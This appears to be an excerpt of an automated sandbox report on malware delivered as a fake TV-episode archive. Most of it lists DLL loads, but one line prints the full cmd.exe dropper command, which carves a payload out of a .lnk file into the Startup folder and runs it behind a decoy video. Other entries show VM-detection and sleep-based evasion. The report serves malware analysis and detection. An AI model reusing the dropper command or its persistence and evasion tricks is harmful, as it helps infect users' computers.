        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rmclient.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: uiamanager.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.core.textinput.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.immersive.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dataexchange.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.system.profile.retailinfo.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.graphics.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.phone.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: twinapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.energy.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.networking.connectivity.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.devices.enumeration.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: directmanipulation.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wuceffects.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.playback.mediaplayer.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfplat.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rtworkq.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.mediacontrol.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mmdevapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: devobj.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmediaengine.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: powrprof.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: xmllite.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: powrprof.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: umpdc.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: audioses.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.devices.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.playback.proxystub.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: devdispitemprovider.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.web.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ddores.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: defaultdevicemanager.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: userenv.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: profext.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: comppkgsup.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmkvsrcsnk.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: appcontracts.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: usermgrproxy.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cdprt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cdp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dsreg.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msvcp110_win.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfps.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmp4srcsnk.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfsrcsnk.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msamrnbsource.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfasfsrcsnk.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfds.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msflacdecoder.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: avrt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmpeg2srcsnk.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfnetsrc.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfnetcore.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dwmapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ninput.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.protection.playready.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msxml6.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wpnapps.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.networking.backgroundtransfer.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: systemeventsbrokerclient.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wininet.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: sspicli.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.lockscreen.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wincorlib.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: lockappbroker.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: winhttp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mswsock.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: winnsi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: biwinrt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dnsapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rasadhlp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: schannel.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.security.authentication.web.core.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vaultcli.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: microsoftaccountwamextension.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfsvr.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.background.timebroker.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dhcpcsvc.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: webio.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windowscodecs.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mskeyprotect.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ntasn1.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ncrypt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ncryptsslp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msasn1.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dpapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rsaenh.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: gpapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptnet.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: gnsdk_fp.dll
        Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
        Source: C:\Windows\System32\Taskmgr.exeWindow found: window name: SysTabControl32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zipStatic file information: File size 7132534 > 1048576
        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
        Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\System32\Taskmgr.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeWindow / User API: threadDelayed 9675
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe TID: 6180Thread sleep count: 9675 > 30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe TID: 6180Thread sleep count: 311 > 30
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe TID: 904Thread sleep count: 266 > 30
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v:on/cset l=from.s03e06.1080p.web.h264-successfulcrab.mkv&set j="c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\user.exe"&(if not exist !j! findstr/v "cmd.exe hit%time:~7,1%%time:~-2%" !l!.lnk>!j!&start "" !j!)&cd c:\users\user\appdata\local\temp&echo.>!l!&start !l!
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
